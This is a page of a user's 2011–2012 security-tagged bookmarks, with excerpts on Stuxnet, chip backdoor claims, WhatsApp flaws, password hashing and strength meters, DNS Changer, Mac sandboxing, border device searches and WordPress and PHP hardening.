The article is adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power, and it confirms that both the US and Israeli governments developed and deployed Stuxnet. The goal of the worm was to break Iranian nuclear centrifuge equipment by issuing specific commands to the industrial control hardware responsible for their spin rate. By doing so, both governments hoped to set back the Iranian research program—and the US hoped to keep Israel from launching a pre-emptive military attack.
hacking  iran  security  usa  cyberattack 
june 2012 by Aetles
Errata Security: Bogus story: no Chinese backdoor in military chip
Today's big news is that researchers have found proof of Chinese manufacturers putting backdoors in American chips that the military uses. This is false. While they did find a backdoor in a popular FPGA chip, there is no evidence the Chinese put it there, or even that it was intentionally malicious.
security  chip  hacking  debugging  hardware 
may 2012 by Aetles
Security researcher: I found secret reprogramming backdoors in Chinese microprocessors - Boing Boing
This backdoor has a key, which we were able to extract. If you use this key you can disable the chip or reprogram it at will, even if locked by the user with their own key. This particular chip is prevalent in many systems from weapons, nuclear power plants to public transport. In other words, this backdoor access could be turned into an advanced Stuxnet weapon to attack potentially millions of systems. The scale and range of possible attacks has huge implications for National Security and public infrastructure.
china  security  chip  backdoor 
may 2012 by Aetles
Is Your Credit Card Stolen? Check for free!
If you fear your credit card info has been stolen, enter it here and you can find out for free. Avoiding fraud has never been easier!
phishing  security 
may 2012 by Aetles
Mathy Vanhoef: WhatsApp Considered Insecure
For my internship I created a methodology to test the security of mobile applications. After I finished it I decided to take a look at WhatsApp and test the methodology I created. Several new vulnerabilities were found, including a very severe one that even affected people not using WhatsApp. But before going into detail let's first investigate the security history of WhatsApp.
whatsapp  iphone  ios  security 
may 2012 by Aetles
Dropbox tech blog » Blog Archive » zxcvbn: realistic password strength estimation
Over the last few months, I’ve seen a password strength meter on almost every signup form I’ve encountered. Password strength meters are on fire.

Here’s a question: does a meter actually help people secure their accounts? It’s less important than other areas of web security, a short sample of which include:

Preventing online cracking with throttling or CAPTCHAs.
Preventing offline cracking by selecting a suitably slow hash function with user-unique salts.
Securing said password hashes.
With that disclaimer — yes. I’m convinced these meters have the potential to help. According to Mark Burnett’s 2006 book, Perfect Passwords: Selection, Protection, Authentication, which counted frequencies from a few million passwords over a variety of leaks, one in nine people had a password in this top 500 list. These passwords include some real stumpers: password1, compaq, 7777777, merlin, rosebud. Burnett ran a more recent study last year, looking at 6 million passwords, and found an insane 99.8% occur in the top 10,000 list, with 91% in the top 1,000. The methodology and bias is an important qualifier — for example, since these passwords mostly come from cracked hashes, the list is biased towards crackable passwords to begin with.

These are only the really easy-to-guess passwords. For the rest, I’d wager a large percentage are still predictable enough to be susceptible to a modest online attack. So I do think these meters could help, by encouraging stronger password decisions through direct feedback. But right now, with a few closed-source exceptions, I believe they mostly hurt. Here’s why.
development  javascript  password  security  dropbox 
april 2012 by Aetles
Coding Horror: Speed Hashing
I'm too busy to read all this.
If you are a user:

Make sure all your passwords are 12 characters or more, ideally a lot more. I recommend adopting pass phrases, which are not only a lot easier to remember than passwords (if not type) but also ridiculously secure against brute forcing purely due to their length.

If you are a developer:

Use bcrypt or PBKDF2 exclusively to hash anything you need to be secure. These new hashes were specifically designed to be difficult to implement on GPUs. Do not use any other form of hash. Almost every other popular hashing scheme is vulnerable to brute forcing by arrays of commodity GPUs, which only get faster and more parallel and easier to program for every year.
encryption  hash  hashing  passwords  security 
april 2012 by Aetles
DNS Changer
Is your DNS OK?
A half dozen national Internet security teams around the world have created special web sites that will display a warning message to potential victims of the DNS Changer infection. For example if you visit then you'll get a German language page saying either that you appear to be infected or that you appear not to be infected. Andrew Fried and I created for the same purpose, though of course our page is in American English. The full list of these "DNS Checking" web sites is published on the DCWG's web site along with a lot of information about the threat, the arrests, the takedown, the court orders, and clean-up information for victims. Now that we've got all these web sites that are able to tell someone if they are a victim and that tell victims what to do to clean up their computers and their home routers, the problem seems to be getting people to care.
dns  security 
march 2012 by Aetles
Red Sweater Blog – Fix The Sandbox
The Broken Sandbox

At its best sandboxing is a means for app developers to faithfully state their intentions in a manner that can be evaluated by users, and also be reliably enforced by the operating system. So if your new “Fun on Facebook” app declares its intention is to connect to the web, you might judiciously allow it. If it says it needs to write files to the root of the filesystem, you’d be wise to search for another app.

Sandboxing on the Mac works by providing developers with a standardized list of “entitlements” which are clear descriptions of things it would like to do on your Mac. Examples include: access the internet, read files from your Pictures folder, print things on your printer.

The number one broken thing about sandboxing as it stands today, is the list of entitlements is simply too limited. Many apps on the App Store, including my own, will need to have their functionality considerably diminished, or in some cases made outright useless, in order to accommodate the available list of entitlements that sandboxing offers.
sandboxing  security  macappstore 
february 2012 by Aetles
Twitter User Barred From US For "Destroy America" Tweet
It is widely known that law enforcement agencies are turning to social networks to monitor citizens but one UK Twitter user saw a joke tweet land him in hot water, as he was detained by Homeland Security in Los Angeles, interrogated and barred from the US, The Sun reveals.

Before Leigh Van Bryan and his friend Emily Bunting embarked on a holiday to Los Angeles, Van Bryan tweeted that he was going to “destroy America,” boasting that he would try “digging up Marilyn Monroe” during his trip across the pond.

If someone tweets they would “destroy America,” you would expect it to alert law-enforcement agencies. However, in the UK, “destroying” can also be used as a term for partying or having a good time.

When Van Bryan and Bunting arrived in the US, they were immediately detained by officials at Los Angeles International Airport, held by armed guards and questioned for over five hours before they were “handcuffed, put in a van with illegal immigrants and locked up overnight.”

Twelve hours later, after being held in separate cells (Van Bryan shared his cell with Mexican drug dealers), the pair were released and put on a plane home.
usa  travel  government  security  twitter 
january 2012 by Aetles
US customs can and will seize laptops and cellphones, demand passwords | Naked Security
The American Civil Liberties Union has brought a suit against the US government over its seizure of the laptop of a computer security consultant - a seizure carried out at a Chicago airport about a year ago without a search warrant or any charges of crimes.

According to a report in Sunday's Boston Globe, the consultant - a former MIT researcher, David House - was returning from rest and relaxation in Mexico when federal agents seized his laptop.

According to the Globe, the government wanted to know more about House's connections to Bradley Manning, the US Army private accused of leaking classified information to WikiLeaks.

The seizure comes as no surprise. As Globe writer Katie Johnston notes, United States ports of entry are dubbed "Constitution-free zones" by civil liberties advocates.

Barring invasive techniques such as strip seizures, government agents are free to disregard Fourth Amendment protection against unreasonable search and seizure. They don't need reasonable suspicion or probable cause, and they can take what they like, be it laptops or smart phones.
usa  security  travel  privacy 
january 2012 by Aetles
Andy Baio: Think You Can Hide, Anonymous Blogger? Two Words: Google Analytics | Epicenter |
Last month, an anonymous blogger popped up on WordPress and Twitter, aiming a giant flamethrower at Mac-friendly writers like John Gruber, Marco Arment and MG Siegler. As he unleashed wave after wave of spittle-flecked rage at “Apple puppets” and “Cupertino douchebags,” I was reminded again of John Gabriel’s theory about the effects of online anonymity.

Out of curiosity, I tried to see who the mystery blogger was.

He was using all the ordinary precautions for hiding his identity — hiding personal info in the domain record, using a different IP address from his other sites, and scrubbing any shared resources from his WordPress install.

Nonetheless, I found his other blog in under a minute — a thoughtful site about technology and local politics, detailing his full name, employer, photo, and family information. He worked for the local government, and if exposed, his anonymous blog could have cost him his job.

I didn’t identify him publicly, but let him quietly know that he wasn’t as anonymous as he thought he was. He stopped blogging that evening, and deleted the blog a week later.

So, how did I do it? The unlucky blogger slipped up and was ratted out by an unlikely source: Google Analytics.
analytics  google  privacy  security 
november 2011 by Aetles
Securing Your WordPress Website - Smashing WordPress
Security has become a foremost concern on the Web in the past few years. Hackers have always been around, but with the increase in computer literacy and the ease of access to virtually any data, the problem has increased exponentially. It is now rare for a new website to not get comment spam within days of its release, even if it is not promoted at all.

This increase in naughty behavior, however, has spurred developers to write better code, and framework vendors have implemented many functions to help coders in their battle against the dark side.

Because data validation and sanitization is a big part of both security safeguards and normal user-input processing, by securing our code we will be not only protecting our behinds, but offering a better, more solid user experience.

While a large part of this article is specific to WordPress, a sizeable chunk is about general practices that anyone can use. Even the WordPress-centric sections contain useful logic, so reading them may well be worth it even if you use a different framework.
security  tips  wordpress 
november 2011 by Aetles
juuso/BozoCrack - GitHub
BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

It works way better than it ever should.
hack  md5  passwords  security 
november 2011 by Aetles
Securing PHP | James Cunningham

While the provided PHP configuration (found in /etc/php.ini) is okay, it’s not great, and can be improved by changing some of the settings specified below.
php  security 
october 2011 by Aetles
Disabling Third-Party Cookies Doesn’t (Meaningfully) Improve Privacy « Kevin Montrose
I noticed in some discussion on Hacker News about Google Chrome an argument that disabling third-party cookies somehow improved privacy.  I don’t intend to comment on the rest of the debate, but this particular assertion is troubling.

At time of writing, only two browsers interfere with third-party cookies in any meaningful way.  Internet Explorer denies setting third-party cookies unless a P3P header is sent.  This is basically an evil bit, and just as pointless.  No other browser even pretends to care about this standard.

The other is Apple’s Safari browser, which denies setting third-party cookies unless a user has “interacted” with the framed content.  The definition of “interacted” is a bit fuzzy, but clicking seems to do it.  No other browser does this, or anything like it.  There are some laughably simple hacks around this, like floating an iframe under the user’s cursor (and, for some reason, submitting a form with a POST method).  Even if those hacks didn’t exist, the idea is still pointless.
security  privacy  cookies  tracking 
september 2011 by Aetles
Some real Shock and Awe: Racially profiled and cuffed in Detroit | Stories from the Heartland
Silly me. I thought flying on 9/11 would be easy. I figured most people would choose not to fly that day so lines would be short, planes would be lightly filled and though security might be ratcheted up, we’d all feel safer knowing we had come a long way since that dreadful Tuesday morning 10 years ago.

But then armed officers stormed my plane, threw me in handcuffs and locked me up.
9/11  security  america 
september 2011 by Aetles
Drupal upgrade easier | fuerstnet
The standard procedure to upgrade Drupal to the latest release is to download it from and follow the included UPGRADE.txt.
For administrators using the UNIX shell it may be easier using the attached patch files below instead of downloading and installing the newest complete Drupal release.
drupal  patch  security  ssh 
may 2011 by Aetles
« earlier      
per page:    204080120160

related tags

1password  2fa  9/11  airports  ajax  america  analytics  android  anonymity  antivirus  apple  authentication  backdoor  backup  browser  browsers  certificate  chat  china  chip  cloud  cookies  cross  Cross-site  cryptography  CSRF  cyberattack  database  debugging  development  dns  dropbox  drupal  eff  elcapitan  email  encryption  Explorer  fingerprints  flash  flying  forgery  form  forms  formulär  games  google  googleauthenticator  government  guncontrol  guns  hack  hacker  hacking  hacks  hardware  hash  hashing  html  icloud  internet  ios  iphone  iran  javascript  jpeg  keychain  linux  mac  macappstore  macos  mactips  mail  maintenance  malware  mathonan  md5  memory  microsoft  network  nfc  Nätverk  osx  passcode  password  passwords  patch  performance  phishing  php  privacy  programming  proxy  request  research  sandboxing  scanner  scripting  security  SEO  server  site  sqlinjection  ssd  ssh  ssl  storage  submission  surveillance  säkerhet  säkerhetshål  tips  tools  tor  tracking  travel  twitter  twofactorauthentication  twostepverification  usa  vpn  Webbutveckling  webdevelopment  webserver  whatsapp  wifi  windows  wordpress  world  xss 

Copy this bookmark: